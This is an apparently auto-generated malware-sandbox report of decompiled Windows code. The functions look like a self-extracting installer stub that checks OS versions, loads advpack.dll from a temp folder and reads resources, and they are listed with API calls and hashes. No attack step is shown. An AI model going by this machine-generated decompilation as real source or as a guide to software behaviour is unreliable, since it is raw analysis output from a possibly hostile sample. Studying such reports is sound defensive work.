                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xbc9a40 = _t119;
                                                                                                                                                                                                        						 *0xbc8184 = 1;
                                                                                                                                                                                                        						 *0xbc8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xbc9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xbc8184 = _t135;
                                                                                                                                                                                                        							 *0xbc8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00BC44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00BC6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00bc39dc
                                                                                                                                                                                                        0x00bc39b6
                                                                                                                                                                                                        0x00bc3955
                                                                                                                                                                                                        0x00bc395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3961
                                                                                                                                                                                                        0x00bc3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00bc3915
                                                                                                                                                                                                        0x00bc3915
                                                                                                                                                                                                        0x00bc391b
                                                                                                                                                                                                        0x00bc391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc392d
                                                                                                                                                                                                        0x00bc3933
                                                                                                                                                                                                        0x00bc3938
                                                                                                                                                                                                        0x00bc393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3940
                                                                                                                                                                                                        0x00bc3946
                                                                                                                                                                                                        0x00bc394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38f2
                                                                                                                                                                                                        0x00bc3843
                                                                                                                                                                                                        0x00bc3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc384b
                                                                                                                                                                                                        0x00bc384d
                                                                                                                                                                                                        0x00bc3883
                                                                                                                                                                                                        0x00bc3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc389a
                                                                                                                                                                                                        0x00bc389e
                                                                                                                                                                                                        0x00bc389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a0
                                                                                                                                                                                                        0x00bc38a0
                                                                                                                                                                                                        0x00bc38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a4
                                                                                                                                                                                                        0x00bc384f
                                                                                                                                                                                                        0x00bc3851
                                                                                                                                                                                                        0x00bc3857
                                                                                                                                                                                                        0x00bc386e
                                                                                                                                                                                                        0x00bc3877
                                                                                                                                                                                                        0x00bc387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3881
                                                                                                                                                                                                        0x00bc3859
                                                                                                                                                                                                        0x00bc385c
                                                                                                                                                                                                        0x00bc3862
                                                                                                                                                                                                        0x00bc3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38f4
                                                                                                                                                                                                        0x00bc38f4
                                                                                                                                                                                                        0x00bc38f5
                                                                                                                                                                                                        0x00bc38fb
                                                                                                                                                                                                        0x00bc3901
                                                                                                                                                                                                        0x00bc3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc390a
                                                                                                                                                                                                        0x00bc374b
                                                                                                                                                                                                        0x00bc374e
                                                                                                                                                                                                        0x00bc375c
                                                                                                                                                                                                        0x00bc3764
                                                                                                                                                                                                        0x00bc3769
                                                                                                                                                                                                        0x00bc376e
                                                                                                                                                                                                        0x00bc3771
                                                                                                                                                                                                        0x00bc379c
                                                                                                                                                                                                        0x00bc379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37a3
                                                                                                                                                                                                        0x00bc37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37a4
                                                                                                                                                                                                        0x00bc3773
                                                                                                                                                                                                        0x00bc3777
                                                                                                                                                                                                        0x00bc3778
                                                                                                                                                                                                        0x00bc377f
                                                                                                                                                                                                        0x00bc3781
                                                                                                                                                                                                        0x00bc378e
                                                                                                                                                                                                        0x00bc378e
                                                                                                                                                                                                        0x00bc3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3794
                                                                                                                                                                                                        0x00bc3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3785
                                                                                                                                                                                                        0x00bc378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc378c
                                                                                                                                                                                                        0x00bc3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc372d
                                                                                                                                                                                                        0x00bc372d
                                                                                                                                                                                                        0x00bc396b
                                                                                                                                                                                                        0x00bc396b
                                                                                                                                                                                                        0x00bc396c
                                                                                                                                                                                                        0x00bc396e
                                                                                                                                                                                                        0x00bc396f
                                                                                                                                                                                                        0x00bc3a1e
                                                                                                                                                                                                        0x00bc3a1e
                                                                                                                                                                                                        0x00bc3a22
                                                                                                                                                                                                        0x00bc3a27
                                                                                                                                                                                                        0x00bc3a3e
                                                                                                                                                                                                        0x00bc3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00BC3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00BC39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 00BC39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: 5300d79a0ccc059ba4dcd8212e7347a936bbc8573abc1ce31fb93590a0ae44d9
                                                                                                                                                                                                        • Instruction ID: 10f24635f68193ef9747ad93aa88bd72a88237c1fa4b975123b6765e8d7528ab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5300d79a0ccc059ba4dcd8212e7347a936bbc8573abc1ce31fb93590a0ae44d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B091E571B012149FDB758B15CC81FAA77F0EB49B04F9581EEE84AA7251DB718F80CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00BC6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00BC1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00BC658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-179718922
                                                                                                                                                                                                        • Opcode ID: 22e4744a34ad3ba2143b7492f7f92c48473544f30089c30b6aab83870808bfb3
                                                                                                                                                                                                        • Instruction ID: 2335033accfd0f0a444ea2a7aa34e60ba615b0ddd90f22708dcd4c1601490935
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22e4744a34ad3ba2143b7492f7f92c48473544f30089c30b6aab83870808bfb3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC018171A0410CABDB50EB64DC49FEA77B8EB69314F6001DDF585A31D0DF70AE8A8A51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00BC2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00BC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00BC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00BC2A6F
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharUpperA.USER32(9F7D84CA,00000000,00000000,00000000), ref: 00BC27A8
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharNextA.USER32(0000054D), ref: 00BC27B5
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharNextA.USER32(00000000), ref: 00BC27BC
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2829
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2852
                                                                                                                                                                                                          • Part of subcall function 00BC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2870
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00BC3938,?,?,?,?,-00000005), ref: 00BC2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00BC2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BC3938,?,?,?,?,-00000005,?), ref: 00BC2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00BC2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 2307a9e3de05458ea9a8ba95a845a98b772f1ba21f6ceaf06970a65b5d6cfb36
                                                                                                                                                                                                        • Instruction ID: 46a61183a8cbd7326eda00a3767cf4d90524d6e3e09d445d712edeaaefa7e0dc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2307a9e3de05458ea9a8ba95a845a98b772f1ba21f6ceaf06970a65b5d6cfb36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64510631A00219EBCB21CF99C884EAEBBF5FF48705F1441AEE905E3211DB319941DBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00BC4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00BC468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00BC468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00BC44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00BC30B4), ref: 00BC4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00BC30B4), ref: 00BC41E7
